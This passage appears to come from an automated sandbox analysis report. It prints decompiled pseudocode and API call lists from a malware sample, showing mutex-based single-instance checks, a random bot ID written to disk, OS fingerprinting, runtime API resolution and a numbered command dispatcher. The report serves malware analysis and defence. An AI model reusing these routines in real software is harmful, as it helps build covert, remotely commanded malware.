    															E00399090(__eflags,  &_v240, 0xc3);
    															_t124 = E00393C70( &_v240,  &_v240,  &_v16,  &_v24);
    															_t280 = _t280 + 0x14;
    															__eflags = _t124;
    															if(_t124 == 0) {
    																goto L61;
    															} else {
    																_t125 =  *0x3b8628; // 0x593938
    																_t126 =  *((intOrPtr*)( *((intOrPtr*)(_t125 + 0xe0))))(_t271, _v16);
    																__eflags = _t126;
    																if(_t126 != 0) {
    																	goto L61;
    																}
    															}
    														}
    													}
    												}
    											}
    										}
    									}
    									goto L69;
    								}
    								__eflags = _t221;
    								if(_t221 == 0) {
    									goto L40;
    								}
    								goto L41;
    							} else {
    								E00399090(__eflags,  &_v240, 0xc3);
    								_t280 = _t280 + 8;
    								_t136 = GetFileAttributesW( &_v240); // executed
    								__eflags = _t136 - 0xffffffff;
    								if(_t136 != 0xffffffff) {
    									__eflags = _t136 & 0x00000010;
    									if((_t136 & 0x00000010) == 0) {
    										goto L34;
    									}
    								}
    							}
    						}
    					} else {
    						E0039E520( &_v40);
    						_t198 =  *0x3b8628; // 0x593938
    						 *((intOrPtr*)( *((intOrPtr*)(_t198 + 0xb4))))(0x104,  &_v1288);
    						E00399090(__eflags,  &_v240, 0xe);
    						_t280 = _t280 + 8;
    						_t199 =  &_v1288;
    						_t200 =  *0x3b8628; // 0x593938
    						 *((intOrPtr*)( *((intOrPtr*)(_t200 + 0xdc))))(_t199,  &_v240, 0, _t199);
    						_t201 =  *0x3b8574; // 0x0
    						_t145 = E003912D0( &_v40, __esi, _a4, _t201,  &_v1288);
    						__eflags = _t145;
    						if(_t145 == 0) {
    							L29:
    							E00397AD0( &_v40);
    						} else {
    							_t273 = 0;
    							while(1) {
    								_t204 =  *0x3b8628; // 0x593938
    								_t148 =  *((intOrPtr*)( *((intOrPtr*)(_t204 + 0xa4))))(_v8);
    								__eflags = _t148;
    								if(_t148 != 0) {
    									break;
    								}
    								_t172 =  *0x3b8628; // 0x593938
    								 *((intOrPtr*)( *((intOrPtr*)(_t172 + 0xc8))))(0x3e8);
    								_t273 = _t273 + 1;
    								__eflags = _t273 - 0xa;
    								if(_t273 < 0xa) {
    									continue;
    								} else {
    									L11:
    									_t156 =  &_v764;
    									_t251 = 0x104;
    									_t276 = _v8 - _t156;
    									__eflags = _t276;
    									while(1) {
    										_t23 = _t251 + 0x7ffffefa; // 0x7ffffffe
    										__eflags = _t23;
    										if(_t23 == 0) {
    											break;
    										}
    										_t218 =  *(_t276 + _t156) & 0x0000ffff;
    										__eflags = _t218;
    										if(_t218 == 0) {
    											break;
    										} else {
    											 *_t156 = _t218;
    											_t156 = _t156 + 2;
    											_t251 = _t251 - 1;
    											__eflags = _t251;
    											if(_t251 != 0) {
    												continue;
    											} else {
    												L17:
    												_t156 = _t156 - 2;
    												__eflags = _t156;
    											}
    										}
    										L18:
    										 *_t156 = 0;
    										E00399090(__eflags,  &_v240, 0xf);
    										_t159 =  *0x3b8628; // 0x593938
    										_t280 = _t280 + 8;
    										 *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x1dc))))( &_v764,  &_v240);
    										_t161 =  *0x3b8628; // 0x593938
    										 *((intOrPtr*)( *((intOrPtr*)(_t161 + 0xa4))))( &_v764);
    										_t277 = 0;
    										__eflags = 0;
    										while(1) {
    											_t213 =  *0x3b8628; // 0x593938
    											_t164 =  *((intOrPtr*)( *((intOrPtr*)(_t213 + 0xd4))))(_v8,  &_v764, 2);
    											__eflags = _t164;
    											if(_t164 != 0) {
    												break;
    											}
    											_t170 =  *0x3b8628; // 0x593938
    											 *((intOrPtr*)( *((intOrPtr*)(_t170 + 0xc8))))(0x3e8);
    											_t277 = _t277 + 1;
    											__eflags = _t277 - 0xa;
    											if(_t277 < 0xa) {
    												continue;
    											}
    											break;
    										}
    										_t278 = 0;
    										__eflags = 0;
    										while(1) {
    											_t214 =  *0x3b8628; // 0x593938
    											_t166 =  *((intOrPtr*)( *((intOrPtr*)(_t214 + 0xb0))))( &_v1288, _v8);
    											__eflags = _t166;
    											if(_t166 != 0) {
    												break;
    											}
    											_t167 =  *0x3b8628; // 0x593938
    											 *((intOrPtr*)( *((intOrPtr*)(_t167 + 0xc8))))(0x3e8);
    											_t278 = _t278 + 1;
    											__eflags = _t278 - 0xa;
    											if(_t278 < 0xa) {
    												continue;
    											} else {
    												 *0x3b8570 = 0;
    												E00397AD0( &_v40);
    											}
    											goto L69;
    										}
    										L25:
    										_v12 = 1;
    										__eflags =  *0x3b8590; // 0x0
    										if(__eflags != 0) {
    											__eflags =  *0x3b858c; // 0x0
    											if(__eflags > 0) {
    												E00399090(__eflags,  &_v240, 0xc3);
    												_t152 =  *0x3b858c; // 0x0
    												_t206 =  *0x3b8590; // 0x0
    												E00391A80(_t206,  &_v240, _t206, _t152);
    												_t280 = _t280 + 0x14;
    											}
    										}
    										 *0x3b8570 = 0;
    										goto L29;
    									}
    									__eflags = _t251;
    									if(__eflags == 0) {
    										goto L17;
    									}
    									goto L18;
    								}
    								goto L69;
    							}
    							_t274 = 0;
    							__eflags = 0;
    							while(1) {
    								_t205 =  *0x3b8628; // 0x593938
    								_t150 =  *((intOrPtr*)( *((intOrPtr*)(_t205 + 0xd4))))( &_v1288, _v8, 2);
    								__eflags = _t150;
    								if(_t150 != 0) {
    									goto L25;
    								}
    								_t154 =  *0x3b8628; // 0x593938
    								 *((intOrPtr*)( *((intOrPtr*)(_t154 + 0xc8))))(0x3e8);
    								_t274 = _t274 + 1;
    								__eflags = _t274 - 0xa;
    								if(_t274 < 0xa) {
    									continue;
    								} else {
    									goto L11;
    								}
    								goto L69;
    							}
    							goto L25;
    						}
    					}
    					L69:
    					_t90 = _v8;
    					__eflags = _t90;
    					if(_t90 != 0) {
    						E0039BB40(_t90);
    					}
    					return _v12;
    				} else {
    					return 0;
    				}
    			}

    APIs
      • Part of subcall function 00391A80: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,0000001F,00000000,00391BCA,?,003A171D,?,00391BCA,?,?), ref: 00391AAB
      • Part of subcall function 00391A80: WriteFile.KERNEL32(00000000,?,00391BCA,000000CC,00000000,?,003A171D,?,00391BCA,?,?,000000CC), ref: 00391ACD
    • GetFileAttributesW.KERNELBASE(?), ref: 003939AB
      • Part of subcall function 00395A10: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,0039FE81), ref: 00395ABF
      • Part of subcall function 00395A10: Sleep.KERNELBASE(00004E20,00000000,0039FE81,757DC426,00000000,00000000,?,?,00000000,0039FE81), ref: 00395B3E
    • memcpy.MSVCRT ref: 00393BC0
      • Part of subcall function 00393C70: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?,?,?,003A14F1,?,00391BCA,?), ref: 00393C9E
      • Part of subcall function 00393C70: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,?,003A14F1,?,00391BCA,?,?,000000B3,00000000,?,?), ref: 00393CBB
      • Part of subcall function 00393C70: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,003A14F1,?,00391BCA,?,?,000000B3,00000000,?,?), ref: 00393CD0
      • Part of subcall function 00393C70: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?), ref: 00393D08
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
      • Part of subcall function 0039E520: CoCreateInstance.OLE32(003B32CC,00000000,00000001,003B32DC,00000000,00396A37,?,00000000), ref: 0039E55C
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 97%
    			E003A14A0(intOrPtr __ecx) {
    				void* _v8;
    				signed int _v12;
    				intOrPtr _v16;
    				intOrPtr _v288;
    				intOrPtr _v292;
    				intOrPtr _v296;
    				char _v300;
    				short _v1324;
    				void* __edi;
    				intOrPtr _t73;
    				void* _t77;
    				void* _t81;
    				void* _t84;
    				void* _t93;
    				int _t95;
    				signed int _t98;
    				signed int _t99;
    				intOrPtr _t110;
    				signed int _t114;
    				intOrPtr _t125;
    				intOrPtr _t126;
    				intOrPtr _t130;
    				intOrPtr _t148;
    				intOrPtr _t149;
    				short* _t150;
    				short* _t152;
    				short* _t155;
    				void* _t157;
    				void* _t158;
    				void* _t159;
    				void* _t160;
    				void* _t161;
    
    				_t149 = __ecx;
    				_t73 =  *((intOrPtr*)(__ecx + 0x14));
    				_v16 = __ecx;
    				_v8 = 0;
    				_v12 = 0;
    				_t164 = _t73;
    				if(_t73 != 0) {
    					E0039BB40(_t73);
    					_t157 = _t157 + 4;
    					 *((intOrPtr*)(__ecx + 0x14)) = 0;
    				}
    				E00399090(_t164,  &_v1324, 0xb3);
    				_t77 = E00393C70( &_v12,  &_v1324,  &_v8,  &_v12); // executed
    				_t158 = _t157 + 0x14;
    				_t165 = _t77;
    				if(_t77 != 0) {
    					L25:
    					 *((intOrPtr*)(_t149 + 0x14)) = _v8;
    					return 1;
    				} else {
    					E00399090(_t165,  &_v1324, 0x33);
    					_t81 = E00393C70( &_v1324,  &_v1324,  &_v8,  &_v12); // executed
    					_t159 = _t158 + 0x14;
    					_t166 = _t81;
    					if(_t81 != 0) {
    						goto L25;
    					} else {
    						E00399090(_t166,  &_v1324, 0xcc);
    						_t84 = E00393C70( &_v8,  &_v1324,  &_v8,  &_v12); // executed
    						_t160 = _t159 + 0x14;
    						if(_t84 != 0) {
    							goto L25;
    						} else {
    							_t125 =  *0x3b8628; // 0x593938
    							_v300 = 0x11c;
    							 *((intOrPtr*)( *((intOrPtr*)(_t125 + 0xfc))))( &_v300);
    							_t114 = 0x208;
    							_t155 = E003A1D90(0x410, 0);
    							_t161 = _t160 + 8;
    							_v8 = _t155;
    							if(_t155 == 0) {
    								L18:
    								E0039BB40(_t155);
    								 *((intOrPtr*)(_t149 + 0x14)) = 0;
    								return 0;
    							} else {
    								_t126 =  *0x3b8628; // 0x593938
    								_push( &_v12);
    								_v12 = 0x208;
    								_push(_t155);
    								if( *((intOrPtr*)( *((intOrPtr*)(_t126 + 4))))() == 0) {
    									_t114 = 0x23a;
    									_t110 = E003A1D90(0x474, _v8);
    									_t148 =  *0x3b8628; // 0x593938
    									_t161 = _t161 + 8;
    									_v8 = _t110;
    									 *((intOrPtr*)( *((intOrPtr*)(_t148 + 4))))(_t110,  &_v12);
    								}
    								E00391000(_v8, 0x5f);
    								_t155 = _v8;
    								_t161 = _t161 + 8;
    								_t150 = _t155;
    								_t93 = _t155 + _t114 * 2;
    								if( *_t155 == 0) {
    									L11:
    									_t173 = _t150 - _t93;
    									if(_t150 < _t93) {
    										 *_t150 = 0x57005f;
    										E00399090(_t173,  &_v1324, 0x44);
    										wsprintfW(_t150 + 4,  &_v1324, _v296, _v292, _v288);
    										_t155 = _v8;
    										_t161 = _t161 + 0x1c;
    									}
    								} else {
    									while(_t150 < _t93) {
    										_t150 = _t150 + 2;
    										if( *_t150 != 0) {
    											continue;
    										} else {
    											goto L11;
    										}
    										goto L13;
    									}
    								}
    								L13:
    								if(_t155 == 0 || _t114 > 0x7fffffff) {
    									L16:
    									_v12 = 0;
    									goto L17;
    								} else {
    									_t142 = _t155;
    									if(E003B1160(_t114, _t155,  &_v12) >= 0) {
    										_t152 = 0x20;
    										do {
    											_t95 = rand();
    											 *((short*)(_v8 + _v12 * 2)) = (_t95 + L003B1270(_t95, _t142) & 0x0000000f) + 0x41;
    											_t130 = _v8;
    											_t98 = _v12;
    											__eflags =  *((short*)(_t130 + _t98 * 2)) - 0x46;
    											if( *((short*)(_t130 + _t98 * 2)) > 0x46) {
    												_t142 = 0xffe9;
    												_t51 = _t130 + _t98 * 2;
    												 *_t51 =  *((intOrPtr*)(_t130 + _t98 * 2)) + 0xffe9;
    												__eflags =  *_t51;
    												_t130 = _v8;
    												_t98 = _v12;
    											}
    											_t99 = _t98 + 1;
    											_t152 = _t152 - 1;
    											__eflags = _t152;
    											_v12 = _t99;
    										} while (_t152 != 0);
    										 *((short*)(_t130 + _t99 * 2)) = 0;
    										_v12 = _v12 + _v12 + 2;
    										_t155 = E003A1D90(_v12 + _v12 + 2, _v8);
    										_t161 = _t161 + 8;
    										_v8 = _t155;
    										__eflags = _t155;
    										if(__eflags == 0) {
    											L17:
    											_t149 = _v16;
    											goto L18;
    										} else {
    											E00399090(__eflags,  &_v1324, 0xcc);
    											E00391A80(_v8,  &_v1324, _v8, _v12); // executed
    											_t149 = _v16;
    											goto L25;
    										}
    									} else {
    										goto L16;
    									}
    								}
    							}
    						}
    					}
    				}
    			}

    APIs
      • Part of subcall function 00393C70: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?,?,?,003A14F1,?,00391BCA,?), ref: 00393C9E
      • Part of subcall function 00393C70: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,?,003A14F1,?,00391BCA,?,?,000000B3,00000000,?,?), ref: 00393CBB
      • Part of subcall function 00393C70: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,003A14F1,?,00391BCA,?,?,000000B3,00000000,?,?), ref: 00393CD0
      • Part of subcall function 00393C70: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?), ref: 00393D08
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    • wsprintfW.USER32 ref: 003A1639
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    • rand.MSVCRT ref: 003A1690
      • Part of subcall function 00391A80: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,0000001F,00000000,00391BCA,?,003A171D,?,00391BCA,?,?), ref: 00391AAB
      • Part of subcall function 00391A80: WriteFile.KERNEL32(00000000,?,00391BCA,000000CC,00000000,?,003A171D,?,00391BCA,?,?,000000CC), ref: 00391ACD
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 85%
    			E00394A10(void* __eflags) {
    				short _v40;
    				char _v42;
    				signed short _v48;
    				signed int _v316;
    				intOrPtr _v320;
    				char _v324;
    				char _v524;
    				char _v624;
    				char _v824;
    				char _v1024;
    				_Unknown_base(*)()* _t51;
    				intOrPtr _t53;
    				void* _t54;
    				void* _t62;
    				signed int _t72;
    				signed int _t73;
    				intOrPtr _t83;
    				intOrPtr _t84;
    				intOrPtr _t86;
    				void* _t100;
    
    				_t84 =  *0x3b8628; // 0x593938
    				_v324 = 0x11c;
    				 *((intOrPtr*)( *((intOrPtr*)(_t84 + 0xfc))))( &_v324);
    				E00399090(__eflags,  &_v524, 0x6c);
    				E00396CB0( &_v624, 0xb5);
    				_t86 =  *0x3b8628; // 0x593938
    				_t51 = GetProcAddress( *((intOrPtr*)( *((intOrPtr*)(_t86 + 0x24))))( &_v624),  &_v524);
    				if(_t51 == 0) {
    					_t83 =  *0x3b8628; // 0x593938
    					_t51 =  *(_t83 + 0x3c);
    				}
    				 *_t51( &_v40); // executed
    				_t53 = _v320;
    				if(_t53 != 0xa) {
    					__eflags = _t53 - 6;
    					if(_t53 != 6) {
    						__eflags = _t53 - 5;
    						if(__eflags != 0) {
    							L19:
    							_t54 = 0x56;
    							L20:
    							E00399090(_t112,  &_v524, _t54 + 1);
    							E00399090(_v40 - 9,  &_v1024, (0 | _v40 != 0x00000009) + 0x58);
    							_t62 = E003A1D90(0x100, 0);
    							_t100 = _t62;
    							if(_t100 != 0) {
    								__eflags = _v48;
    								if(__eflags == 0) {
    									E00399090(__eflags,  &_v824, 0xc);
    									_push( &_v1024);
    									E003A0C10(_t100, 0x100,  &_v824,  &_v524);
    									return _t100;
    								} else {
    									E00399090(__eflags,  &_v824, 0x5a);
    									_push(_v48 & 0x0000ffff);
    									_push( &_v1024);
    									E003A0C10(_t100, 0x100,  &_v824,  &_v524);
    									return _t100;
    								}
    							} else {
    								return _t62;
    							}
    						}
    						_t72 = _v316;
    						__eflags = _t72 - 2;
    						if(__eflags != 0) {
    							__eflags = _t72 - 1;
    							if(__eflags != 0) {
    								__eflags = _t72;
    								_t54 = 0x55;
    								if(__eflags == 0) {
    									goto L20;
    								}
    								goto L19;
    							}
    							_t54 = 0x54;
    							goto L20;
    						}
    						_t54 = 0x53;
    						goto L20;
    					}
    					_t73 = _v316;
    					__eflags = _t73 - 3;
    					if(_t73 != 3) {
    						__eflags = _t73 - 2;
    						if(_t73 != 2) {
    							__eflags = _t73 - 1;
    							if(_t73 != 1) {
    								__eflags = _t73;
    								if(__eflags != 0) {
    									goto L19;
    								}
    								__eflags = _v42 - 1;
    								_t54 = (_t73 & 0xffffff00 | __eflags == 0x00000000) + 0x51;
    								goto L20;
    							}
    							__eflags = _v42 - 1;
    							_t54 = (0 | __eflags == 0x00000000) + 0x4f;
    							goto L20;
    						}
    						__eflags = _v42 - 1;
    						_t54 = (0 | __eflags == 0x00000000) + 0x4d;
    						goto L20;
    					}
    					__eflags = _v42 - 1;
    					_t54 = (0 | __eflags == 0x00000000) + 0x4b;
    					goto L20;
    				}
    				_t112 = _v42 - 1;
    				_t54 = (0 | _v42 == 0x00000001) + 0x49;
    				goto L20;
    			}

    APIs
    • GetProcAddress.KERNEL32(00000000), ref: 00394A74
    • GetNativeSystemInfo.KERNEL32(00000000), ref: 00394A8A
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
      • Part of subcall function 003A0C10: _vsnwprintf.MSVCRT ref: 003A0C42
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 88%
    			E0039AF00(void* __ebx, void* __ecx, void* __edi) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				intOrPtr _t46;
    				void* _t48;
    				void* _t49;
    				intOrPtr _t51;
    				intOrPtr _t59;
    				intOrPtr _t64;
    				intOrPtr _t65;
    				intOrPtr _t66;
    				void* _t67;
    				void* _t71;
    				intOrPtr* _t73;
    				intOrPtr _t77;
    				intOrPtr _t78;
    				void* _t98;
    				void* _t99;
    				void* _t101;
    				void* _t102;
    				void* _t103;
    
    				_t101 = __ecx;
    				_v8 = 0;
    				_v12 = 0;
    				if( *((intOrPtr*)(__ecx + 0x34)) != 0) {
    					_t73 = __imp___wtoi;
    					_t98 =  *_t73( *((intOrPtr*)(__ecx + 0x40)), __edi, __ebx);
    					_t103 = _t102 + 4;
    					__eflags = _t98 - 1;
    					if(_t98 == 1) {
    						_t66 = E0039DA00( *((intOrPtr*)(__ecx + 0xc)));
    						__eflags = _t66;
    						if(_t66 != 0) {
    							_t67 = E0039DA00( *((intOrPtr*)(__ecx + 0xc)));
    							__eflags =  *((intOrPtr*)(__ecx + 0x10)) - _t67;
    							if( *((intOrPtr*)(__ecx + 0x10)) >= _t67) {
    								 *((intOrPtr*)(__ecx + 0x10)) = 0;
    							}
    							E00396110(_t101, __eflags,  *((intOrPtr*)(E0039F530( *((intOrPtr*)(_t101 + 0xc)),  *((intOrPtr*)(_t101 + 0x10))))),  *((intOrPtr*)(_t68 + 4)));
    							_t71 =  *_t73( *((intOrPtr*)(_t101 + 0x40)));
    							_t103 = _t103 + 4;
    							_t98 = _t71;
    							_v12 = 1;
    						}
    					}
    					_t46 =  *((intOrPtr*)(_t101 + 0x3c));
    					__eflags = _t46;
    					if(_t46 == 0) {
    						L10:
    						_t99 = _t98 - 1;
    						__eflags = _t99 - 0x62;
    						if(_t99 <= 0x62) {
    							_t18 = _t99 + 0x39b0a0; // 0x5050000
    							switch( *((intOrPtr*)(( *_t18 & 0x000000ff) * 4 +  &M0039B088))) {
    								case 0:
    									_v8 = 1;
    									goto L18;
    								case 1:
    									__ecx = __esi;
    									__eax = E00397D40(__ecx);
    									goto L17;
    								case 2:
    									__ecx = __esi;
    									__eax = E00394310(__ecx);
    									goto L17;
    								case 3:
    									__ecx = __esi; // executed
    									__eax = E00398880(__ebx, __ecx, __edi, __esi); // executed
    									goto L17;
    								case 4:
    									__ecx = __esi;
    									__eax = E00399B50(__ecx, __edi, __esi);
    									L17:
    									_v8 = __eax;
    									goto L18;
    								case 5:
    									goto L18;
    							}
    						}
    					} else {
    						_t64 =  *0x3b8628; // 0x593938
    						_t65 =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 8))))( *((intOrPtr*)(_t101 + 0x50)), _t46);
    						__eflags = _t65;
    						if(_t65 != 0) {
    							goto L10;
    						} else {
    							_v8 = 1;
    						}
    					}
    					L18:
    					__eflags = _v12;
    					if(_v12 == 0) {
    						L28:
    						return _v8;
    					} else {
    						_t48 = E0039C860(_t101);
    						_t77 =  *((intOrPtr*)(_t101 + 0xc));
    						__eflags = _t48 - 4;
    						if(_t48 == 4) {
    							_t49 = E0039F530(_t77,  *((intOrPtr*)(_t101 + 0x10)));
    							_t78 =  *((intOrPtr*)(_t49 + 8));
    							__eflags = _t78 - 4;
    							if(_t78 <= 4) {
    								 *((intOrPtr*)(_t49 + 8)) = _t78 + 1;
    								_t39 = _t101 + 0x10;
    								 *_t39 =  *((intOrPtr*)(_t101 + 0x10)) + 1;
    								__eflags =  *_t39;
    								E003916B0(_t101 + 0x30);
    								goto L28;
    							} else {
    								_t51 =  *((intOrPtr*)(_t49 + 4));
    								__eflags = _t51;
    								if(_t51 != 0) {
    									E0039BB40(_t51);
    								}
    								E0039DC80( *((intOrPtr*)(_t101 + 0xc)),  *((intOrPtr*)(_t101 + 0x10)));
    								E003916B0(_t101 + 0x30);
    								return _v8;
    							}
    						} else {
    							_t59 =  *((intOrPtr*)(E0039F530(_t77,  *((intOrPtr*)(_t101 + 0x10))) + 4));
    							__eflags = _t59;
    							if(_t59 != 0) {
    								E0039BB40(_t59);
    							}
    							E0039DC80( *((intOrPtr*)(_t101 + 0xc)),  *((intOrPtr*)(_t101 + 0x10)));
    							E003916B0(_t101 + 0x30);
    							return _v8;
    						}
    					}
    				} else {
    					return 0;
    				}
    			}

    APIs
    • _wtoi.MSVCRT ref: 0039AF27
      • Part of subcall function 00396110: _itow.MSVCRT ref: 0039615E
    • _wtoi.MSVCRT ref: 0039AF71
      • Part of subcall function 00394310: SHGetFolderPathW.SHELL32(00000000,0000001C,?,00000000,?), ref: 00394371
      • Part of subcall function 00398880: memset.MSVCRT ref: 003988CA
      • Part of subcall function 00398880: memset.MSVCRT ref: 003988DC
      • Part of subcall function 00398880: memcpy.MSVCRT ref: 00398E15
      • Part of subcall function 0039DC80: memcpy.MSVCRT ref: 0039DCB8
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
      • Part of subcall function 003916B0: memset.MSVCRT ref: 003916EE
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E00393500(void** __ecx, void* __eflags) {
    				int _v8;
    				int _v12;
    				int _v16;
    				char _v20;
    				short _v220;
    				intOrPtr _t22;
    				int _t23;
    				void* _t27;
    				int _t28;
    				intOrPtr _t29;
    				intOrPtr _t38;
    				void* _t45;
    				void** _t46;
    				void* _t48;
    				struct _SECURITY_ATTRIBUTES* _t49;
    
    				_t46 = __ecx;
    				_v8 = 0;
    				E00399090(__eflags,  &_v220, 0xa2);
    				_t22 =  *0x3b8628; // 0x593938
    				_t23 =  *((intOrPtr*)( *((intOrPtr*)(_t22 + 0x174))))( &_v220, 1,  &_v8, 0, _t45, _t48);
    				if(_t23 != 0) {
    					_t49 =  &_v20;
    				} else {
    					_v8 = _t23;
    					_t49 = 0;
    				}
    				_v20 = 0xc;
    				_v12 = 0;
    				_v16 = _v8;
    				E0039F0B0( &_v220);
    				_t27 = CreateMutexW(_t49, 1,  &_v220); // executed
    				 *_t46 = _t27;
    				_t28 = _v8;
    				if(_t28 != 0) {
    					_t38 =  *0x3b8628; // 0x593938
    					 *((intOrPtr*)( *((intOrPtr*)(_t38 + 0x9c))))(_t28);
    				}
    				if( *_t46 == 0) {
    					ExitProcess(0);
    				}
    				_t29 =  *0x3b8628; // 0x593938
    				return 0 |  *((intOrPtr*)( *((intOrPtr*)(_t29 + 0x30))))() == 0x000000b7;
    			}

    APIs
      • Part of subcall function 0039F0B0: memset.MSVCRT ref: 0039F0CE
      • Part of subcall function 0039F0B0: GetWindowsDirectoryW.KERNEL32(?,00000208), ref: 0039F0E2
      • Part of subcall function 0039F0B0: GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0039F11E
    • CreateMutexW.KERNELBASE(?,00000001,?), ref: 0039358B
    • ExitProcess.KERNEL32 ref: 003935AE
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E0039E520(intOrPtr* __ecx) {
    				void* _v8;
    				void* _t15;
    				void* _t16;
    				intOrPtr* _t18;
    				intOrPtr* _t20;
    				intOrPtr* _t22;
    				intOrPtr _t28;
    				void* _t36;
    
    				_t1 = __ecx + 8; // 0x8
    				 *__ecx = 0x3b32c8;
    				E00392750(_t1);
    				_t2 =  &_v8; // 0x396a37
    				_t15 = E00396D20(_t2);
    				_t28 =  *0x3b8628; // 0x593938
    				_t16 =  *((intOrPtr*)( *((intOrPtr*)(_t28 + 0x1c4))))(0x3b32cc, 0, 1, 0x3b32dc, _t15, _t36, __ecx); // executed
    				if(_t16 < 0) {
    					 *((intOrPtr*)(__ecx + 4)) = 0;
    					return __ecx;
    				} else {
    					_t18 = _v8;
